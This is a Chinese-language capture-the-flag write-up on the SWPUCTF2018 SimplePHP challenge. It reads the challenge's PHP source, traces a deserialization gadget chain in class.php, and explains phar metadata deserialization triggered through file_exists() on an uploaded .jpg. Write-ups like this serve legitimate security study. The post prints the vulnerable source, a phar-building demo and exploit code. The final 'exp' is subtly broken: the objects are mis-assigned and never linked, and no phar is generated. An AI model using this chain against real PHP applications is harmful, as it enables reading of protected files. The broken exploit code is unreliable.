title: SWPUCTF2018SimplePHP.md
date: 2022-06-25 08:06:23
tags:
登陆进去之后发现上传文件 这里我们试着上传一个shell试试
发现过滤了 应该 直接上传shell不可以
这时候发现地址栏有
http://6c691358-af7a-4c96-8b95-8fe66c84b7fe.node4.buuoj.cn:81/file.php?file=
应该可以读取文件
尝试读取一下index.php
<?php
header("content-type:text/html;charset=utf-8");
include 'base.php';
?>
这里看到包含了base.php
这里还发现了其他的文件
upload_file.php f1ag.php file.php
看一下upload_file.php
尝试看一下f1ag.php
读取之后发现它回显了个 hacker!
应该是进行了过滤
再i看看别的代码把
我们在这个里面看到了upload_file.php 看到了 function.php 这里再查一下它
<?php
//show_source(__FILE__);
include "base.php";
header("Content-type: text/html;charset=utf-8");
error_reporting(0);
function upload_file_do() {
global $_FILES;
$filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg";
//mkdir("upload",0777);
if(file_exists("upload/" . $filename)) {
unlink($filename);
}
move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename);
echo '<script type="text/javascript">alert("上传成功!");</script>';
}
function upload_file() {
global $_FILES;
if(upload_file_check()) {
upload_file_do();
}
}
function upload_file_check() {
global $_FILES;
$allowed_types = array("gif","jpeg","jpg","png");
$temp = explode(".",$_FILES["file"]["name"]);
$extension = end($temp);
if(empty($extension)) {
//echo "<h4>请选择上传的文件:" . "<h4/>";
}
else{
if(in_array($extension,$allowed_types)) {
return true;
}
else {
echo '<script type="text/javascript">alert("Invalid file!");</script>';
return false;
}
}
}
?>
file.php
<?php
header("content-type:text/html;charset=utf-8");
include 'function.php';
include 'class.php';
ini_set('open_basedir','/var/www/html/');
$file = $_GET["file"] ? $_GET['file'] : "";
if(empty($file)) {
echo "<h2>There is no file to show!<h2/>";
}
$show = new Show();
if(file_exists($file)) {
$show->source = $file;
$show->_show();
} else if (!empty($file)){
die('file doesn\'t exists.');
}
?>
class.php
首页
查看文件
上传文件
10.244.80.206
<?php
class C1e4r
{
public $test;
public $str;
public function __construct($name)
{
$this->str = $name;
}
public function __destruct()
{
$this->test = $this->str;
echo $this->test;
}
}
class Show
{
public $source;
public $str;
public function __construct($file)
{
$this->source = $file; //$this->source = phar://phar.jpg
echo $this->source;
}
public function __toString()
{
$content = $this->str['str']->source;
return $content;
}
public function __set($key,$value)
{
$this->$key = $value;
}
public function _show()
{
if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
die('hacker!');
} else {
highlight_file($this->source);
}
}
public function __wakeup()
{
if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
echo "hacker~";
$this->source = "index.php";
}
}
}
class Test
{
public $file;
public $params;
public function __construct()
{
$this->params = array();
}
public function __get($key)
{
return $this->get($key);
}
public function get($key)
{
if(isset($this->params[$key])) {
$value = $this->params[$key];
} else {
$value = "index.php";
}
return $this->file_get($value);
}
public function file_get($value)
{
$text = base64_encode(file_get_contents($value));
return $text;
}
}
?>
看到一推类 想想是不是利用反序列化漏洞
审一下class.php里面的代码把
这里面找到了一个函数file_get_contents()
这个函数可以把文件里的内容赋值给一个变量
这里我们就明确方向了只要把$vale的值变为f1ag.php就可以了
然后我们往上推一下
看到get方法调用了file_get方法
然后继续往上推看到了__get模式方法调用了get方法
这里简单解释一下__get()魔术方法
当调用一个调用不到的属性的时候就会触发__get方法
然后我们继续往上看一下
这里看到Show类中有个tostring方法
然后我们只需要把$str['str']复制为new Test 就可以触发__get方法了
然后我们看一下如何触发__toString方法
这里如果一个类被当作字符串利用的话就会触发toString方法
这里我们往上找找看到了echo 这里也可以触发tostring魔术方法
我们需要把test赋值为new Show就可以了
把然后整个思路寄出来了
我们先new 一个 C1e4r类然后 就会调用construct方法把我们传入的给C1e4
r
$a=new C1e4r(new Show)
我们发现这样子不行的
但是我们稍微往里想一下
这个__construct函数是当我们实例化一以对象之后就会调用的函数
然后我们可以利用反序列化漏洞使它在更改str的值
然后经过构析方法__destruct方法就可以把str的值赋值给test
这里我们先稍微写一下
<?php
#phpinfo();
class C1e4r
{
public $test;
public $str;
}
class Show
{
public $source;
public $str;
}
class Test
{
public $file;
public $params;
}
$a=new C1e4r();
$a->test=new Show();
$b=new Show();
$b->str['str']=new Test();
$c=new Test();
$c->params['source'] = "/var/www/html/f1ag.php";
我们要利用反序列化漏洞嘛然后我们发现连get post 还有unserialize()函数都没哈哈哈哈哈
这个时候我们要介绍一个新的知识点
phar反序列化
简单解释 通常在我们利用反序列化漏洞的时候,只能将序列化后的字符串传入unserialize(),但是有的他不会给出unserialize函数
这个时候我们就可以利用这个phar反序列化就可以了
phar文件结构
1 a stub
可以理解为一个标志,格式为
xxx<?php xxx; __HALT_COMILER();?>
前面的内容不变,但必须以
__HALT__COMPILER();?>
结尾
否则phar扩展将无法识别这个phar文件
2 a manifest describing the contents
phar 文件本质上是一种压缩文件,其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的mete-data,这是上述攻击手法最核心的地方
3 the file contents
被压缩的内容。
4[optional] a signature for verifying Phar integrity(phar file format only)
签名,放在文件末尾 格式如下
demo测试
自己来构建一个phar文件,php内置类了一个phar类来处理相关操作。
注意:要将php.ini中的phar.readonly 选项设置为off,否则无法生成phar文件
<?php
class kkkl{
}
$a=new kkkl();
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
#设置stub
$phar->setStub('<?php __HALT_COMPILER(); ?>');
#将自定义的meta-data存入
$phar->setMetadata($a);
#添加要压缩的文件
$phar->addFromString('test.txt','test');
#签名自动计算
$phar->stopBuffering();
这句话很重要要好好理解理解
有序列化数据必然会有反序列化操作,php一大部分的文件操作系统在通过phar://伪协议解析phar文件的时候,都会将meta-data进行反序列化,测试后受影响的函数如下:
顺一下思路先
最终我们需要通过把f1ag来放入value这个我们可以使用反序列化来实现
但是呢我们这里没有反序列化
我们就要通过phar文件
来反序列化它
然后生成一个文件我们刚才序列化的东西放入meta-data然后生成一个phar文件 又因为 .phar文件会被过滤但是 它是利用stub结构来识别文件的 所以我们可以用gif来代替phar
通过上述文件操作函数配合phar伪协议
可以将meta-data反序列化出来
然后就利用反序列化漏洞啦
然后构造exp
<?php
#phpinfo();
class C1e4r
{
public $test;
public $str;
}
class Show
{
public $source;
public $str;
}
class Test
{
public $file;
public $params;
}
$a=new C1e4r();
$a->test=new Show();
$b=new Show();
$b->str['str']=new Test();
$c=new Test();
$c->params['source'] = "/var/www/html/f1ag.php";
这里利用了file_exists()函数来反序列化meta-data里面的数据实现反序列化漏洞
if(file_exists($file)) {
$show->source = $file;
$show->_show();
}
else if (!empty($file)){
die('file doesn\'t exists.');
}
?file=phar://upload/dbd5038d253a35130812a6d326381bfc.jpg
这里phar伪协议配合文件系统函数就能出
这里是base64 因为这里是
$text = base64_encode(file_get_contents($value));
编码 之后才输出的
标签:__,md,序列化,get,phar,SWPUCTF2018SimplePHP,file,php From: https://www.cnblogs.com/kkkkl/p/16748393.html